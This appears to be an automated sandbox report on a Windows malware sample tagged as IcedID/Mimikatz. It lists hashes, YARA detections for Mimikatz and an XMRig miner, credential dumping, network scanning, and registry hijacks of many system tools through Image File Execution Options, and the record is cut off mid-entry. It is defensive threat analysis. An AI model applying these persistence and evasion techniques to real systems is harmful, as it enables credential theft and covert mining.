Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2025 23:22
Behavioral task
behavioral1
Sample
2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe
-
Size
8.6MB
-
MD5
0dadce60328353ce4f127adcf963836a
-
SHA1
eed41266ca171e7d8b4ac85cc13015ffb6045a3f
-
SHA256
22a3bf2391a210adc8452bcadd26c2a00d7608245ff5ecc98a29d74cef7f3f7d
-
SHA512
03d155fff931a2aa2ec1c10b8d8a52710d53c400686f8c9dcb55656c0aa0f010732fcdc52575db81cc9eec60964a02e218e61a96802a18ec11652e2726d31f90
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3884 created 1708 3884 jirnzjt.exe 38 -
Xmrig family
-
Contacts a large (30077) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4656-178-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-182-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-199-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-212-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-225-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-232-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-249-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-461-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-462-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-465-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-689-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig behavioral2/memory/4656-690-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/2372-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2372-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000a000000023b7b-6.dat mimikatz behavioral2/memory/872-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2612-138-0x00007FF77A0A0000-0x00007FF77A18E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts jirnzjt.exe File opened for modification C:\Windows\system32\drivers\etc\hosts jirnzjt.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe jirnzjt.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4284 netsh.exe 732 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 872 jirnzjt.exe 3884 jirnzjt.exe 1432 wpcap.exe 4484 llefvytvt.exe 2612 vfshost.exe 3924 vrlgkrtsk.exe 3252 xohudmc.exe 3668 tyttue.exe 4656 jngiyk.exe 1432 vrlgkrtsk.exe 3964 vrlgkrtsk.exe 1232 vrlgkrtsk.exe 3300 vrlgkrtsk.exe 2004 vrlgkrtsk.exe 4248 vrlgkrtsk.exe 5080 vrlgkrtsk.exe 1964 vrlgkrtsk.exe 3108 vrlgkrtsk.exe 2228 vrlgkrtsk.exe 3020 jirnzjt.exe 2556 vrlgkrtsk.exe 2968 vrlgkrtsk.exe 3236 vrlgkrtsk.exe 1520 vrlgkrtsk.exe 4832 vrlgkrtsk.exe 3536 vrlgkrtsk.exe 4248 vrlgkrtsk.exe 5008 lsivtqwuf.exe 2808 jirnzjt.exe -
Loads dropped DLL 12 IoCs
pid Process 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 1432 wpcap.exe 4484 llefvytvt.exe 4484 llefvytvt.exe 4484 llefvytvt.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jirnzjt.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jirnzjt.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\tyttue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F jirnzjt.exe File opened for modification C:\Windows\SysWOW64\tyttue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jirnzjt.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F jirnzjt.exe -
resource yara_rule behavioral2/files/0x0007000000023c65-134.dat upx behavioral2/memory/2612-136-0x00007FF77A0A0000-0x00007FF77A18E000-memory.dmp upx behavioral2/memory/2612-138-0x00007FF77A0A0000-0x00007FF77A18E000-memory.dmp upx behavioral2/files/0x0007000000023c70-141.dat upx behavioral2/memory/3924-142-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/3924-146-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-164-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/files/0x0007000000023c6d-163.dat upx behavioral2/memory/1432-171-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/3964-175-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-178-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/1232-180-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-182-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/3300-185-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/2004-189-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4248-193-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/5080-197-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-199-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/1964-202-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/3108-206-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/2228-210-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-212-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/2556-219-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/2968-223-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-225-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/3236-228-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/1520-231-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-232-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/4832-234-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/3536-236-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4248-238-0x00007FF781410000-0x00007FF78146B000-memory.dmp upx behavioral2/memory/4656-249-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/4656-461-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/4656-462-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/4656-465-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/4656-689-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx behavioral2/memory/4656-690-0x00007FF7E2D50000-0x00007FF7E2E70000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\etqajulug\UnattendGC\specials\libxml2.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\zlib1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\docmicfg.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\docmicfg.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\svschost.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\spoolsrv.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\jirnzjt.exe 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe File created C:\Windows\etqajulug\UnattendGC\specials\svschost.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\schoedcl.xml jirnzjt.exe File created C:\Windows\mgifenbt\docmicfg.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\wpcap.exe jirnzjt.exe File opened for modification C:\Windows\mgifenbt\schoedcl.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\posh-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\schoedcl.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\trch-1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\spoolsrv.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\docmicfg.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\svschost.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\AppCapture64.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\AppCapture32.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\cnli-1.dll jirnzjt.exe File opened for modification C:\Windows\etqajulug\Corporate\log.txt cmd.exe File opened for modification C:\Windows\etqajulug\ekithtuut\Result.txt lsivtqwuf.exe File created C:\Windows\etqajulug\Corporate\vfshost.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\tibe-2.dll jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\scan.bat jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\crli-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\ssleay32.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\vimpcsvc.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\vimpcsvc.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\Packet.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\schoedcl.exe jirnzjt.exe File opened for modification C:\Windows\mgifenbt\docmicfg.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\ip.txt jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\trfo-2.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\exma-1.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\tucl-1.dll jirnzjt.exe File created C:\Windows\mgifenbt\spoolsrv.xml jirnzjt.exe File created C:\Windows\etqajulug\Corporate\mimilib.dll jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\wpcap.dll jirnzjt.exe File created C:\Windows\mgifenbt\vimpcsvc.xml jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\ucl.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\xdvl-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\Shellcode.ini jirnzjt.exe File created C:\Windows\etqajulug\Corporate\mimidrv.sys jirnzjt.exe File opened for modification C:\Windows\etqajulug\ekithtuut\Packet.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\coli-0.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\specials\libeay32.dll jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\vimpcsvc.xml jirnzjt.exe File created C:\Windows\etqajulug\upbdrjv\swrpwe.exe jirnzjt.exe File created C:\Windows\mgifenbt\jirnzjt.exe 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe File created C:\Windows\ime\jirnzjt.exe jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\llefvytvt.exe jirnzjt.exe File created C:\Windows\etqajulug\UnattendGC\svschost.xml jirnzjt.exe File created C:\Windows\mgifenbt\svschost.xml jirnzjt.exe File created C:\Windows\mgifenbt\schoedcl.xml jirnzjt.exe File opened for modification C:\Windows\mgifenbt\vimpcsvc.xml jirnzjt.exe File created C:\Windows\etqajulug\ekithtuut\lsivtqwuf.exe jirnzjt.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1412 sc.exe 1800 sc.exe 4848 sc.exe 4388 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jirnzjt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language llefvytvt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened 